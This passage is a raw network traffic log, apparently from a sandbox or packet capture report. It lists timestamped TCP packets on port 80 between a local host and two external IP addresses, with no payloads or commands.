Aug 23, 2022 18:24:04.404788971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404799938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404804945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404823065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404835939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404839993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404869080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404880047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404886007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404897928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404915094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404930115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404932022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404948950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404948950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404967070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.404977083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.404983997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.405003071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.405018091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.405019045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.405035973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.405039072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.405076027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.405102968 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.423475027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423511028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423538923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423564911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423592091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423593044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.423618078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.423629045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.423650026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.423731089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.427762032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427793980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427822113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427849054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427879095 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.427894115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427902937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.427922964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.427944899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.427974939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.427990913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428016901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428041935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.428045034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428073883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428075075 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.428085089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.428101063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428122044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.428132057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428143978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.428163052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.428209066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430444002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430483103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430519104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430547953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430556059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430583954 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430591106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430618048 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430628061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430634022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430656910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430675983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430696964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430712938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430735111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430742025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430771112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430797100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.430818081 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.430851936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431747913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431787014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431823015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431860924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431865931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431881905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431894064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431898117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431921005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431957006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.431962013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.431988001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432009935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432033062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432070971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432107925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432157040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432213068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432250023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432286978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432298899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432321072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432347059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432370901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432383060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432394981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432420015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432430029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432456970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432477951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432482958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432507992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432518959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432555914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432575941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432591915 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432602882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432616949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432641983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432651997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432703972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432708979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432751894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.432804108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.432986975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.433042049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.433119059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.433136940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.433154106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.433185101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.433209896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.433229923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455293894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455364943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455416918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455446005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455456018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455495119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455497980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455535889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455537081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455559015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455578089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455585003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455616951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455626965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455656052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455661058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455688953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.455703974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.455739021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460624933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460665941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460706949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460731030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460762978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460781097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460802078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460810900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460841894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460849047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460881948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460886955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460922956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460939884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.460963964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.460993052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.461014986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.461031914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.461050987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.461071968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.461081028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.461110115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.461116076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.461138964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.461154938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.461528063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.463481903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.463593006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463633060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463665962 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.463673115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463709116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.463736057 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.463761091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463802099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463843107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463881016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463920116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463959932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.463989019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464078903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:04.464268923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464445114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464483976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464493990 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464524031 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464529991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464564085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464602947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464602947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464636087 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464642048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464657068 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464672089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.464709044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.464744091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.465641975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465683937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465723991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465742111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.465764046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465792894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.465805054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465818882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.465843916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.465866089 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.465909004 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466036081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466078997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466097116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466118097 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466139078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466157913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466171980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466198921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466207981 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466238022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466249943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466278076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466317892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466331959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466356039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466379881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466415882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.466435909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.466475964 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487569094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487626076 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487665892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487715960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487720966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487765074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487766027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487797022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487806082 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487817049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487844944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487859011 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487883091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487896919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487921953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487930059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.487952948 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.487992048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.488003016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.488033056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.488037109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.488070965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.488100052 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.488122940 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.488148928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506640911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506690025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506731987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506756067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506773949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506788015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506813049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506829023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506853104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506863117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506895065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506901979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506932974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506941080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.506973028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.506978989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507011890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507019997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507051945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507057905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507092953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507101059 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507122993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507150888 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507163048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507188082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507204056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507210970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507241964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507271051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507276058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507308960 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507309914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507328033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507376909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507381916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507425070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507448912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507457972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507486105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507538080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507549047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507591963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507606983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507632971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507672071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507689953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507713079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507731915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507752895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507761955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507793903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507803917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507834911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507844925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507873058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507883072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507911921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507925034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.507952929 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.507989883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508008957 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508029938 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508037090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508070946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508111000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508126974 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508152008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508172989 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508189917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508204937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:04.508229971 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:04.508269072 CEST	80	49827	45.95.11.158	192.168.2.3
